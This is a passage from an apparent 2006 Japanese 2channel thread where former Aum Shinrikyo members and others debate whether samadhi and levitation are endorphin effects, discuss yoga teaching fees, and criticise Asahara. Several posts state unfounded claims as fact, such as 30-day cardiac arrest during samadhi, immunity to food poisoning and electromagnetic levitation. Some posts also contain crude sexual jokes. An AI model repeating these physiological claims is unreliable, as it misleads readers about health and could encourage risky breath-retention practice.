その違い。

495 :名無しさん@3周年:2006/10/14(土) 03:52:11 ID:dm92B+p+
マラソンやると、途中苦しくなるが、それに耐えて走っていると
急に楽になる時期がある。
これも脳内麻薬によるものらしい。

496 :名無しさん@3周年:2006/10/14(土) 03:54:11 ID:QGoxCxs+
たしかに激しい呼吸法や極限のクンバカなんかで脳内麻薬の放出があり
それがオウムの神秘体験の一角をなしているのは確かだと思うね。

497 :名無しさん@3周年:2006/10/14(土) 03:54:11 ID:dm92B+p+
>>494
そうですね。持続しないです。

498 :名無しさん@3周年:2006/10/14(土) 03:55:50 ID:QGoxCxs+
>>495
あれっ!ID同じだ。こんな事あるんだ?

499 :名無しさん@3周年:2006/10/14(土) 03:57:10 ID:QGoxCxs+
>>498間違い、勘違いです。orz

500 :名無しさん@3周年:2006/10/14(土) 03:57:45 ID:AuDF5GTE
>>498
あるよ。
回線を繋ぎなおしたからといって油断してはダメw

501 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:58:14 ID:p7gM8nmZ
>>493
>脳内麻薬で交通事故で体が破損しても痛みを感じなかった

その場はね。でも脳内麻薬が切れると・・・。
そして、普通、例えば足を破損してたりすると苦痛が生じる。つまり足が無いことに苦痛を感じる。
その突然与えられたハンディキャップにね。
ところが解脱者はそれを苦とは思わない。肉体は自分を縛り付けるものだと知ってるから。
もっと大きな自由を得ているから。

>脳内麻薬で貧乏な人が頑張って働き、商売などで成功したという例も多々ある

まあ、それは認めるよ。
でも、解脱ってその成功ってとこにもあまり頓着しなくなるの。
成功は変化する。いつまでもそのままではない。って知ってるから。

>こうした一般人から見たら不思議なものはその体験者の多さから言ってあるものなのだろう。

うん。あるだろうね。
でも、もっと凄い世界もあるんだよ。それこそ修行の過程でしか得られないものが。

502 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 04:00:34 ID:p7gM8nmZ
>>487

へえ。買ってみるよ。ありがとう〜^^

>>488


やられたw

503 :名無しさん@3周年:2006/10/14(土) 04:01:19 ID:dm92B+p+
だって、同じ人が書いていいるしw

504 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 04:12:54 ID:p7gM8nmZ
>>492

ヒマラヤの聖者やチベット仏教のリンポチェ、テーラヴァーダの長老を見ていると・・・
我慢強いのとはまた違うんだなって思うよ。
苦を自分の中で受け止めないでスルーさせているというか・・・
「苦しい!」ってそこで苦を掴まないというか・・・

505 :名無しさん@3周年:2006/10/14(土) 04:14:32 ID:cdEKkdEw
そうすると修行によって脳内麻薬が放出し続ける状態が修行で実現されている、
と考えられない事もないのかな?心も関係してくるから別かな。物理的な現象だけで
説明しようとしても無駄ですかね。

506 :名無しさん@3周年:2006/10/14(土) 04:19:05 ID:S12gt7Og
オウムの神秘体験は脳内麻薬だという意見があるが、脳内麻薬でも
老化や怪我病気の痛みが消え、軽い病気なら治り、天国みたいな幻覚が
見えて気分も晴れやかで幸福感があるなら、それはそれで幸せだろうと思う。
脳内麻薬の幻覚で幸福感を得るのは現実逃避という意見もあるが、映画やテレビ
も現実から逃避した幸福感を与えて、それが欲しい人がたくさんいる訳だろう。


507 :名無しさん@3周年:2006/10/14(土) 04:23:17 ID:dm92B+p+
>>504
その人たちは、頭がいいのですよ。
私は頭悪いから、苦しみを真に受ける。
で、我慢する。で、酒や煙草でごまかすw

508 :名無しさん@3周年:2006/10/14(土) 04:23:53 ID:S12gt7Og
釈迦の伝説にある解脱も実は脳内麻薬だったとしても、何かそこで全身が
光に包まれ、凄い幸福感があり、一切の邪念、怨念みたいなものから解放
されて晴れた空みたいな爽快感があるなら、例えるなら風呂上りに冷たい
ビールと枝豆を食うようなものでスカーッとして、それはそれで人間の
幸せのひとつなんじゃないか?
スーパー銭湯なんかもそれには及ばないにせよ、そうした幸福を売って
多くの人に愛されてる訳だろ?


509 :名無しさん@3周年:2006/10/14(土) 04:28:04 ID:S12gt7Og
最近はホームレスになる人が増えてるとか言われるが、そこで
脳内麻薬によって公園の水道水が高級ワインのような味として
味わえ、公園のベンチが高級ホテルのふかふかベットのように感じ、
腐った生ごみ食べても脳内麻薬で食中毒にならないうえ、高級レストラン
の豪華ディナーのような幻覚が見えたら、それはそれで間違いなく
幸せだろうよ。


510 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 05:01:10 ID:p7gM8nmZ
>>506

でも、その脳内麻薬を永続で維持できない。それが出来ない以上この論は破綻している。

>>508

でも、その脳内麻薬で説明できないことはどうするの?
例えばサマディ。凄いのになると30日間も呼吸停止・心臓停止・脳波停止。その状態(実質的には死。なのに身体は腐ることもない)
から戻ってくる。これは脳内麻薬で説明つくかな?
だから君の言うハッピーと解脱とは隔たりがあるね。

>>509
だからその脳内麻薬の分泌が止まったらどうするの?とたんに不幸せが襲ってくるよw

511 :名無しさん@3周年:2006/10/14(土) 05:25:02 ID:S12gt7Og
>>510
ヨガ体操による脳の活性化で普通人の脳内では合成できない特殊な
脳内麻薬ホルモンが合成できる特殊体質になり、それで昆虫のサナギ
や冬眠の爬虫類のような人間離れした仮死生命力を体得したという説明
ではどうでしょうか?
さらに特殊な脳内麻薬ホルモンの効果で汗や内臓に腐敗を防ぐ特殊な乳酸菌
などを増加させて腐敗を防いでるという説明はどうでしょうか?


512 :名無しさん@3周年:2006/10/14(土) 05:29:08 ID:S12gt7Og
オウムの人は頭にコブのようなものができてる例があるらしいが、
これを無理やり科学的に説明すれば、あればラクダのコブのような
もので、脳幹が細胞の成長を促す特殊な脳内麻薬ホルモンで成長
して大きくなったのか、あるいは脳内麻薬ホルモンの原料である
たんぱく質などの栄養素を貯蔵する貯蔵庫なのではないか?

513 :名無しさん@3周年:2006/10/14(土) 05:36:09 ID:S12gt7Og
筋肉の細胞は重いバーベルなどを持ち上げる訓練をすると、
プロレスラーのような太い腕にパワーアップするが、背骨の脊椎神経
もヨガ訓練などをすると筋肉と同じく細胞が肥大化して、たくましい
象の脊髄のような硬くて太いものになり、これを古代人はクンダリニー
の炎パワーとか呼んだのではないか?
電気回路に例えれば、細い銅の電線が人間の胴くらいに光ファイバー回線
を束ねたワイヤーケーブルにパワーアップしたようなもので、普通人を超える
神経伝達機能がそこで発生するとかさ。
その波及効果で胃や腸も丈夫になるとかさ。


514 :名無しさん@3周年:2006/10/14(土) 06:26:09 ID:S12gt7Og
ようは摩訶不思議な現象が古来から宗教の伝説で言われてるような
理由によるものであれ、科学的な脳内麻薬によるものであれ、何で
あれ病気が治ったり等の幸せはある訳で悪い面はともかく、良い面
は肯定していいと思う。
医学でも病気が治る薬を駄目だと言ったら、医学の発展などあるはずがない。
古来からの宗教伝説が正しいなら、神も釈迦もイエスキリストも間違いなく
尊敬すべき偉大なる存在だろうしね。
それを崇めた古代人は正しかったということになる。
反対に脳内麻薬ホルモンの働きであったとしても、、、、
脳内麻薬を否定すると言っても、まさか脳を取り外して無脳人間として
生きる訳にもいかない訳で脳が付いてるなら、その脳の健康、活力、活性化
を促すのも脳がある生命体である人間にとっては重要な幸せファクターだろう。
丈夫な足腰や胃腸作りと同じように重要なはずだろうし、人間は足が切れても義足
で生活できるが、脳が駄目になったら植物人間か死亡しかない。



515 :名無しさん@3周年:2006/10/14(土) 07:49:55 ID:7iBYETSw
昼過ぎにはパソコンの前に座りますから、安心してください。

516 :名無しさん@3周年:2006/10/14(土) 08:02:27 ID:S12gt7Og
空中浮揚も脳内麻薬説で強引に説明してみたい。
オリンピックなどでドーピング麻薬によって超人的な筋力を引き出す
ことが可能なことは相次ぐドーピング問題で明らかでしょう。
次に南米アマゾンの電気ウナギが体の筋肉繊維を激しく振動させて
静電気を大きな電力に変えることも知られている。
では脳内麻薬で人間が電気ウナギのように激しく全身の筋肉を超人的に振動させ
て電気を作り、それで強力な電磁力を発生させて浮いてるという説明は
どうだろうか?
それだけでは電磁力が足らないなら、脳内麻薬で発生した生体機能で空気中や地面の
静電気も吸収してるのやも知れないし、太陽熱発電や太陽光発電も脳内麻薬でやるのやも知れぬ。
そしてこの電磁力を肛門などからホバークラフトのようにジェット噴射する!
これで羽根が無くても飛ぶのだ。
機械で作り出した強力な電磁力で人間が浮くことは実験でも証明されてるし、もしか
したらこれなのではないか?


517 :名無しさん@3周年:2006/10/14(土) 08:06:17 ID:S12gt7Og
一秒が三十秒に感じられたとか、頭が偉くなって東大合格なんて
のはこりゃもう脳内麻薬でも無理なく説明できよう。
筋肉増大注射みたいに、脳内麻薬で脳細胞にスーパーターボチャージャー
がかかったと説明できるはずだ。

518 :名無しさん@3周年:2006/10/14(土) 09:01:50 ID:oGlsVKvm
>>510
その30日間の呼吸停止・心臓停止というのはちゃんとした記録があるのですか?
詳しいソースを教えてください。

519 :名無しさん@3周年:2006/10/14(土) 09:28:37 ID:S12gt7Og
>>518
オウム以外のヨガの本などを読んでも確かにサマディ現象については書かれている。
インドのラーマークリシュナという人などはしょっちゅうサマディに入ってたそうだ。
宗教的にはそれはヒンズーの神のお救いでそうなったと説明されてるが、ヒンズーの神
を熱狂的に崇拝する人がそのあまりの熱狂崇拝状態で脳内麻薬が噴出し、幸福感や光輝く
ヒンズーの神の幻覚を見ながら、何ヶ月も仮死状態で寝てたのかも知れない。
無呼吸でももしかすると、皮膚から少しだけ皮膚呼吸してるのかも知れないしね。



520 :名無しさん@3周年:2006/10/14(土) 09:38:05 ID:S12gt7Og
現在は謎が多いサマディ現象だが、これが医学的に解明されていく
とちょうど現在の睡眠のようなものになり、昼飯を食べた後に
「ちょっと公園のベンチで昼サマディでもするか」とか言うような
社会になり、夜は「そろそろ遅いし、サマディしようかしら」とか
言ってサマディ睡眠をするようになるのかも知れない。
もしかするとそれは究極の安眠とでも言うべきもので、疲労回復、
肉体回復、若返りなどの効果も現在の睡眠よりはるかに優れたもの
なのかも知れない。
ついでにサマディ睡眠の間に幻覚の世界で受験勉強などをして、
これが本当の睡眠学習だという社会になっているのかも知れない。


521 :名無しさん@3周年:2006/10/14(土) 09:49:21 ID:S12gt7Og
オウム人はサティアンで腐ったものを食べてたが、食中毒にならない
という話も聞いたことがあるが、これも脳内麻薬で説明すれば、胃腸
の働きが異様なまでに脳内麻薬で活性化されて牛や豚のように野性味あふれる
たくましい胃腸になっているのではないか?
家畜の牛などは土が付いた雑草をそのまま食べて生きてるではないか。
他にも竹だけを食べるパンダ、毒があるユーカリの葉だけを食べるコアラ、
土を食べて生きるミミズ、腐った肉が好物のハイエナなどの例もある。
ヒマラヤに住む裸のヨガ老人などが生きてる不思議の秘密もこれで、牛や豚の
ような強靭なる胃袋で雑草、苔、雪、動物の死骸、昆虫などを消化吸収して
生きてるのではないか?




522 :名無しさん@3周年:2006/10/14(土) 09:59:46 ID:S12gt7Og
水中クンバカもこれも脳内麻薬で説明ができよう。
ようは脳内の特殊なホルモンの働きで、心肺機能が常人の比では
ないほど活性化して、アシカやイルカのような水中適応能力が
肉体に付随されたのではないか?
酸素が極めて薄く、雑草くらいしか食物が無く、くそ寒いヒマラヤ
でヨガ老人が生きれるほどの生物的機能が人類に潜在的にあるなら、
イルカのようになってもそれは生物の可能性として不思議ではない。
ダーウィンの進化論で言えば、陸イグアナと海イグアナがそれぞれ
自然環境に適応して進化することで生き延びたようなものじゃないのか?
人間だって気候風土に合わせて白人、黒人、黄色人と進化してるのだしね。
毛むくじゃらで知能が低いサルが現在のような人間に進化したのも、こうした
脳内麻薬ホルモンによる細胞進化であった可能性もある。


523 :名無しさん@3周年:2006/10/14(土) 10:00:17 ID:dmNaf4ig
>516
>空中浮揚も脳内麻薬説で強引に説明してみたい

空中浮揚ビデオっていうのがあったら悩みましょう。
まず事実があるのかしら、ですが。

524 :名無しさん@3周年:2006/10/14(土) 10:03:13 ID:oGlsVKvm
脳については今だに分からないことだらけ。
俺はサマディについては潜在意識や脳内麻薬等でミトコンドリアに無意識に
干渉しているのではないかと思う。
ミトコンドリアには人間を超人へと変容させる何かがあると思う。

525 :名無しさん@3周年:2006/10/14(土) 11:04:25 ID:S12gt7Og
>>523
滝本弁護士やお笑い芸人の江頭2時50分も自宅で座禅を組んで、筋肉
の力だけで飛んだところを写真や映像におさめてテレビ公開していた。
それは確かに筋肉の力で瞬間的にジャンプしてました。
はっきり言ってただのジャンプです。
この滝本説によると筋肉の力だけでジャンプしてるに過ぎないとのことだが、
もしかするとそこに脳内麻薬で倍増された凄まじい筋肉のバネの収縮によって
ノミやバッタのように常人では考えられない筋肉ジャンプ運動をするのかも知れない。
オリンピックの棒高跳びや新体操などを見たら解るように、人間には常人では考えも
付かないような筋肉バネが内蔵されてるからです。




526 :名無しさん@3周年:2006/10/14(土) 11:17:00 ID:S12gt7Og
>>524
進化論でも人類はこの数十万年の間により二足歩行に適応し、
哺乳類としてより高度化し、知能も発達進歩してきた。
こうした生物進化と宗教サマディの間になんらかの相関関係
があってもおかしくはない。
サルが猿人になり、猿人が原人になり、原人が新人になったなんて
いう進化もよくよく考えたら宗教的奇跡に近い生物現象だからです。
解りやすく言えば近所の犬が進化して、二足歩行を始め、知能も高度化
して犬人間が誕生し、さらには犬人間の村までできたというようなものですからね。
そんなことがあったら間違いなくニュースになるし、一種の宗教奇跡だと
言っても過言じゃないでしょう。
生物をより高度に活性化する何かの力があったればこそ、この地球上に人類という生物
も進化誕生してるわけでしょう。
生物も植物もまだまだ不思議な面が多々ある。


527 :名無しさん@3周年:2006/10/14(土) 11:28:44 ID:dm92B+p+
冬眠するヒグマやトカゲもサマディか?
てんとう虫やオツネントンボ、アリや蜂もサマディ?

528 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 11:43:39 ID:p7gM8nmZ
>>518

インドヒマラヤ聖者が百十数回以上のサマディを公開。その中にはサマディ時のメディカルデータを提供したものもあります。
何かにそのデータとか載ってたんだけど・・・
ちと探してみますね。

529 :名無しさん@3周年:2006/10/14(土) 11:43:51 ID:5hEmDP8H
アナル売りで尻に肉棒突っ込んでエクスタシーもサマディ?

530 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 12:02:29 ID:p7gM8nmZ
ID:S12gt7Ogさん

あなたの論は面白いけど、無理がありすぎですね。
サマディを脳内麻薬で説明するには、説明不可能な例が多々ありますよ。
例えばシャンカラという聖者は恋愛の真理を求めてサマディで他人の身体に入って
その身体を借りて恋愛を体験してきたり、チベット仏教のビルパのように太陽を止めて
みたり、他にも「外界」や「一般人」に影響を及ぼしたりしています。
まさか伝染する脳内麻薬とか言わないでしょうね?

>>520は面白いですけど、無理でしょう。
サマディは物理的側面を超越してる(サマディに至ってない俺の瞑想でさえ物理的側面を超越してる)
ので科学的・医学的には理由つけは出来たとしても手軽にそれに入れるようにはならないと思う。

あとは・・・脳内麻薬でそれらが出来るようになってから話してくれ

531 :名無しさん@3周年:2006/10/14(土) 12:19:48 ID:rFfyMxCe
>>529
おい現役。
負け惜しみって言葉知ってるか?
俺は芝の言ってることを評価するぜ。
お前らはそこにしか価値基準がないのさ(笑)
一番アナルにとらわれてるのはお前らなのさ。

532 :名無しさん@3周年:2006/10/14(土) 12:45:12 ID:dm92B+p+
シヴァの喜びタンは、将来的には、ヨーガ指導で生計を立てたいとお考えですか?

533 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 12:50:22 ID:p7gM8nmZ
>>532

今の仕事とヨーガ指導の両立を考えています。
既にヨーガを教え始めてはいますが、収入と言えるようになるにはまだまだですね。



534 :名無しさん@3周年:2006/10/14(土) 12:59:13 ID:dm92B+p+
>>533
オウムみたいに、布施で指導されているのですか、
それとも、月会費のみで指導されているのですか?
私がヨーガと聞くと、やはり多額の布施を要求されそうで怖い感じも否めません。

535 :名無しさん@3周年:2006/10/14(土) 13:02:11 ID:eEiWnGmO
キャンディーはアカのヤマギシに行けばよかったのに
破壊カルトに入ったことが最大のミス

536 :名無しさん@3周年:2006/10/14(土) 13:09:21 ID:oGlsVKvm
>>533
今の仕事って何やってるのか知らんが解脱するには
社会生活を離れなくてはならないのでは?「遠離の段階」
少なくとも弟子や友人の元を去らなくてはならない。


537 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 13:11:14 ID:p7gM8nmZ
>>534

一回数時間の指導を2〜5千円くらいで数人まとめて行っています。
個人的な指導はもう少しだけ頂いていますが(内容を濃くするため)
それでも現在は一万円は越えません。自分のレベルに合わせてますw
お布施ですか・・・あれば嬉しいですが、提供したものに対する報酬だけで
十分かな・・・まあ、あれば将来自分のヨガスタジオを持つのに時間短縮
されるんでしょうけどねw



538 :名無しさん@3周年:2006/10/14(土) 13:16:29 ID:ffSXsU+6
>>447
犯罪が明るみにならず、いまだにオウム現役だったらと考えるとぞっとする

オウムが事件起こしても、起こさなくても辞めて正解

539 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 13:22:08 ID:p7gM8nmZ
>>536
在家の状態でサマディを達成してる方がインドには少なからずいるね。
条件は難しいとは思うけど必ずしも弟子や友人の元を去らなくてもいいと思う。
一時的には必要だとは思うけどね。
サマディが起こるようになるまでの準備は在家でも可能だとは思う。


540 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 13:28:11 ID:p7gM8nmZ
>>536

その「遠離」の時間を短くするか長くするかは本人次第じゃないかな?
仏典に出てくる釈迦ムニの弟子なんかは既に準備が整っていたのでその時間は
一瞬だったようだし(釈迦ムニの話を聞いただけで悟ったりしてる)
これが絶対条件でもないような気がする。

541 :名無しさん@3周年:2006/10/14(土) 13:31:24 ID:dm92B+p+
>>537
そのくらいの金額なら、高すぎず、低すぎずですね。
ところで、アーレフから脱退し、個人でヨーガ指導している
パモーチャナっていう人がいますが
彼はヨーガ的には、どのくらいのレベルなんでしょうか?

542 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 13:39:17 ID:p7gM8nmZ
>>541

ごめんなさい。
その人を直接見たことがないので分りません。
ただ、オウムのヨーガをそのまま採用してるならある程度は高いレベル(普通のヨガ教室よりも少し上)
でしょうけどそれで最終段階には至れないと思います。ベクトルが違うから。



543 :名無しさん@3周年:2006/10/14(土) 13:44:45 ID:5yWmGMNg
供物を捨ててはいけない、って発想からかしらないけど
確かマハヤナの体験談に、腐りかけた果物、だったかと、(スイカ?)
サマナに供養させたんだと

それが、もうにおいもするし、味も食べ物の味でなかったそうなんだけど
指導していた師が(いままで、自分がどれだけ味に執着していたか、
考えて御覧なさい)っていったらしい
確かに、おいしいもの、に執着するから、まずいもの、を食ったとき
苦悩が増大するんだけど、、

しかし、残飯処理みたいなことまでさせて、サマナは干からびさせていたのに
(つまり、食べ物を捨てると悪行になるってんで)
アチャリが言えば、食べきれないほどアーモンド買いこんで、
お下がりサマナにくれてやって、サマナが食えないってうめいているし
、、マンションは買うし!
なんだよ、この差、、
まるで、宮様ばりじゃねえか?
ばかに大切にされて、他とチガクて当然って、、なめるなよ?

544 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 13:46:58 ID:p7gM8nmZ
>>534

補足させていただくなら、そのような指導は今は月に数回しかやっていません。
5千円なんて金額もどこか遠くで行う時に頂こうと思ってる設定です。
内容は聖者から教えて頂いたヒマラヤの秘伝内容をそのまま伝えているので
どこの団体や教室でも教えない、教えていない、知らない内容のものばかりです。
アーサナ一つ取ってみても一般に伝わってるものとは考え方が違ったりします(同じポーズだったとしても)

545 :名無しさん@3周年:2006/10/14(土) 13:49:41 ID:dm92B+p+
>>542
確か彼は智徳の轍という、ホームページを開設してました。
アーレフ時代は、説法をよくしていました。
瞑想もよくやっていたみたいでしたよ。
しかし、ベクトルがチヅオなんです。

546 :名無しさん@3周年:2006/10/14(土) 13:52:49 ID:oGlsVKvm
麻原先生はムドラーだけでも長時間やれば必ず三味に入れると言っている。
それだけの効果を持つ行法で一日10時間以上行じていた時期もあったとか。
またアーサナとは違い、全てを行ずる必要があり食事前に一時間ずつできると
数十倍の効果が得られると言っている。
神に近づくムドラーか・・・始めてみるかな。

547 :名無しさん@3周年:2006/10/14(土) 13:55:44 ID:5yWmGMNg
紙に近づく無ドラって、たしか4セットしか一度にやってはいけないって
書いてなかった
教組は1時間やったのかね

確かに、少し心臓に負担がかかるという気がした
私はやり方が適当だけど、真面目にやったら、心臓に着そう

548 :名無しさん@3周年:2006/10/14(土) 13:56:46 ID:9WCixskM
>>545

良いじゃないですか!!

素晴らしい方だと思います。


http://blog.goo.ne.jp/bodhicarya/c/4132e8996223229e9a75e85ca0a943d1


549 :名無しさん@3周年:2006/10/14(土) 13:57:41 ID:dm92B+p+
麻原みたいに狂ったら、どうする?
そう思うと、深入りするのは怖いんだよなぁ。ヨーガ。

550 :名無しさん@3周年:2006/10/14(土) 13:59:55 ID:5yWmGMNg
漏れは、行をするとしたら、ヴァヤヴィヤが好きというか効果が実感できると
思っているんだけど
あれやると、時間をのばせばのばすほど、変わった感覚になるよね
何か、体が、グラグラして、頭の中に稲妻が走るの
自分が電化される感じがするけど、、
あまり時間が延ばせなくて、クンバカが長くなると
何が起きるんだろう?


551 :名無しさん@3周年:2006/10/14(土) 14:01:58 ID:RV4mKzzK
遊びならやるなよ。

552 :名無しさん@3周年:2006/10/14(土) 14:05:28 ID:4sN2duC2
麻原の説いたヨーガを独学でやるのは危険かもね。
やっぱり自分の目的、相性のあった先生を探さないと。

553 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 14:06:19 ID:p7gM8nmZ
>>546

知ってるクリア、ムドラーで30分もやればかなり深い瞑想にいきなり入れるものがあります。
後は瞑想あるのみ。

いろいろ知った今から考えれば十数時間もムドラーって無意味だね。
それなら瞑想を長時間するのが本筋。

「智徳の轍」見ました。
確かに素晴らしいんだけど・・・オウムの理論抜けてないなあ・・・


554 :名無しさん@3周年:2006/10/14(土) 14:07:21 ID:fY7zGmFq
オウムにいると他の先生をバカにするところがあるからな。イクナイ。

555 :名無しさん@3周年:2006/10/14(土) 14:12:17 ID:5yWmGMNg
パモっておれ、無責任男に見えるんだけど、、
あんな教組を賛美しながら、団体離れて自由そう、、
しかも、教組にもらったレベル認定をチラチラさせながら、
自分の口座を(たしか)書いて、布施まで受け付けてねえ?
まあ、死活問題なんだろうけど、、

団体に残って、賠償活動でもしたほうが、ゼンタイのためには良い気がするけど
そんなに修行が得意なら、教団に残って教えてくれたら
信者だって布施のし甲斐もありそうだし
堕落したサマナばかりだ、ってもどきはいうし

556 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 14:21:53 ID:p7gM8nmZ
>>555

いいんじゃない?
団体行動苦手な人だっているし。釈迦ムニの頃にもそういうの苦手でいつも一人で離れて
自分で修行してた人もいたようだし。
問題はグルイズムと教義が抜けてないことかな・・・頭良さそうなのにね。勿体無い。
ベクトルが違うってことに気がつけばなあ。

あと・・・HPの文読んでて思ったのは・・・なんだか本人がグルになろうとしてないかな・・・
って思ったのは俺だけ?

557 :名無しさん@3周年:2006/10/14(土) 14:25:49 ID:oGlsVKvm
>>556
>>HPの文読んでて思ったのは・・・なんだか本人がグルになろうとしてないかな・
彼の文法は尊師の説法に瓜二つwwwwwww
グルのエネルギーをコピーされたんじゃまいか?wwww

558 :名無しさん@3周年:2006/10/14(土) 14:32:08 ID:5yWmGMNg
>あと・・・HPの文読んでて思ったのは・・・なんだか本人がグルになろうとしてないかな・・・

シヴァさんや、あんたもそうならないように、気をつけたほうがいいよ
教え始めるとマンが出るかもしれないし

漏れはさあ、教組って、他人には説教するじゃん
たとえば、修行して、すべてが好転しはじめた しめしめ、など思うと
魔につかれるって
教組がそれだったんじゃないかって
だってさあ、教組って、文無しだったでしょう?
それが、財産なげうって、ケイマみたいな美人が住み込みで自分のために
働いてくれて、サクラーとかも、
男性たちもね、それで金が儲かると、エジプトいってみたりさあ
、、、
修行を教えて、ただ衆生のために教えたんならいいけど
自分もうまみがあったからさ、、だから魔境に入ったんじゃないかすら
これはいいや、って教祖自体が、思っていたんじゃないかしらね

559 :名無しさん@3周年:2006/10/14(土) 14:48:41 ID:dm92B+p+
女は生まれながらに、マンがあるから
解脱できないのですか?

560 :名無しさん@3周年:2006/10/14(土) 14:49:02 ID:5yWmGMNg
比べるのもお釈迦様に失礼だけど、
釈迦は何でも持っていたんだよね 王子様だったし
親が出家を食い止めようとして、美人とかあらゆる快楽を与えたんだけど
くだらない、空しいと出家して、わざとボロを着ていた

教組って、修行始めたら、美人が集まった金が集まった、って
で、美人が(全員じゃない、、)集まったのを、あたかも広告塔のように
使ったわけだけど
釈迦は、女を全面に押し出したりしないでも、弟子を獲得したよなあ?
まあ、2500年前のことだから、確認不可能だけどよ
それどころか、女が出家教団に居ること自体を、嫌った人だもんね


561 :名無しさん@3周年:2006/10/14(土) 14:55:01 ID:5yWmGMNg
少なくとも、教組が教団を立ち上げた最初の理由は
経済事情だよ 絶対そう
世の中を平和にしようとか幸せにしたいとかいう以前に、自分の生活が
立ち行かなかったんだモノ

それが、修行始めたらケイマ、サクラって美人が金もってやってきて
自分に仕えたんでしょう?
欲望が、バリバリあるんだよねえ、、あー楽しいなって思ったんだよ
だから、あんな事件が起きたんじゃネエノ

562 :名無しさん@3周年:2006/10/14(土) 14:55:49 ID:+Nr3Uw/4
>>558
> >あと・・・HPの文読んでて思ったのは・・・なんだか本人がグルになろうとしてないかな・・・
>
> シヴァさんや、あんたもそうならないように、気をつけたほうがいいよ
> 教え始めるとマンが出るかもしれないし
>

まったくです。
これは何についてもいえる事だと思うので戒めると共に、座右の言葉とさせて頂きます。

563 :名無しさん@3周年:2006/10/14(土) 14:59:57 ID:dm92B+p+
シヴァの喜びさんは、タイプの男と
そうでない男を平等に指導しますか?
やはり、無意識のうちに差別しちゃうんじゃないでしょうか?
ところで、痩せとデブとマッチョの中では、
どれがタイプですか?
ちなみに私は痩せマッチョタイプです。

564 :名無しさん@3周年:2006/10/14(土) 15:00:29 ID:5yWmGMNg
しかもあの、、超能力秘密の開発法の、客寄せ効果を狙った内容って
下賎だよ(漏れはそれ読んできたからひどいけどさ、、)

きた人が、この教団は美人ばかり集まっているとか、、
(事実入信して、うそばっかと、綺麗な人もいた、というだけ)
パンツが透けて見えるとか

パンツが透けて見える師って、どのくらいいます
ボウチュウ術とか、、

565 :名無しさん@3周年:2006/10/14(土) 15:02:03 ID:5yWmGMNg
パンツが透けて見えたら、パンツの中身も当然、透けて見えるんだよね?
ヨゲシヴァラナンダに至っては、体内組織まで透けて見えていたらしいもんね
内臓とか、、

566 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:05:24 ID:p7gM8nmZ
>>588
>シヴァさんや、あんたもそうならないように、気をつけたほうがいいよ
教え始めるとマンが出るかもしれないし

うん。
それはいつも気をつけてる。
ほんとは誰にも教えず自分一人だけでも良かったのだけど、知りたい人はいるだろうし
かつて麻原に知らず知らず加担してしまった責任はこういう形でも取れるんじゃないかと思ったのでね。
だから自分が教えてる時は「先生」とか「師匠」は厳禁。「友達」でいさせて貰ってる。


567 :名無しさん@3周年:2006/10/14(土) 15:06:21 ID:dm92B+p+
クルタだと、パンティーラインは見えたよ。
女の人って、後ろ姿はたいがい美人なんだよ。
牡は牝の尻を追い掛ける生き物なのかな?

568 :名無しさん@3周年:2006/10/14(土) 15:06:29 ID:0wyPCtY6
パンツが透けて見えるのはいいのだけれど、臭いまで伝わってこないのかすら? クチャイ

569 :名無しさん@3周年:2006/10/14(土) 15:08:01 ID:5yWmGMNg
ま、いいグルがいたら、金払ってでも教わりたいってのは結構なんだけど
釈迦無二みたいに、誰よりも自分の家が金持ちだったら
(金のために)教えないもんね
セコイ布施なんか受けなくても、自分が王子様なんだもの

ま、仕方ないんだけど、生活がかかっているとなると
みなさんを幸せにしたいなんて、うそだろ、まず自分が幸せになりたいんだろ、って
思っちゃうよ
ついでに、ユトリがでるとマンション買うしよ、、

570 :名無しさん@3周年:2006/10/14(土) 15:11:31 ID:dm92B+p+
男の小便と女の小便は臭いが違うね。
便所掃除したらわかるけど。
男の小便はアンモニア臭がキツイ。
女の小便はそれほどでもない。

571 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:12:05 ID:p7gM8nmZ
>>563

うん。
これは実は自分の良い特性だと思ってるんだけど・・・指導してる最中には男も女も全部平等に見えてる。
本業の方もこの特性のせいで助かってる。
教えてる間は心の一部が止まってるように感じてる。ただ「人」とか「友達」に見えてる。


タイプは言わないw

572 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:15:23 ID:p7gM8nmZ
たぶん、教えてる人のエネルギーとかいろんなもの見ながら、アーサナ選択したり
呼吸法を変えたり、話す内容を吟味したりしてるので相手の容姿や性別に拘ってる
余裕が無いっていうのが正解かもw

573 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 15:19:38 ID:p7gM8nmZ
>まず自分が幸せになりたいんだろ、って

たしかにまず自分が幸せにならなきゃいけないんだけど麻原みたいに過剰なのは問題だし、
解脱っていう幸せからは遠いものではね。


574 :名無しさん@3周年:2006/10/14(土) 15:22:04 ID:5yWmGMNg
>釈迦は、女を全面に押し出したりしないでも、弟子を獲得したよなあ?
まあ、2500年前のことだから、確認不可能だけどよ
それどころか、女が出家教団に居ること自体を、嫌った人だもんね

教組って、まったく、女性が出家することを嫌がらなかったもんね?
ある意味、女性にも同等に機会があってよいけど、結局、女性の弟子に手を
つけるし、、

釈迦はそこらへん、やはり非常に、立派だよね
女性を出家させなければ、女性問題が起こりえようがないし
非常に用意周到で慎重な人
アナンダに懇願されて、仕方なく許したし、
教組みたいなバカと違うよ 



575 :名無しさん@3周年:2006/10/14(土) 15:22:46 ID:dm92B+p+
>>571
素晴らしいですね!
私は男にはなぜかモテルのです。キスされたり、痴漢されたり、、
だから、少し同性愛の人にトラウマがあります。

576 :名無しさん@3周年:2006/10/14(土) 15:24:56 ID:oGlsVKvm
シヴァの喜びさんへ、小さい写真ですが・・
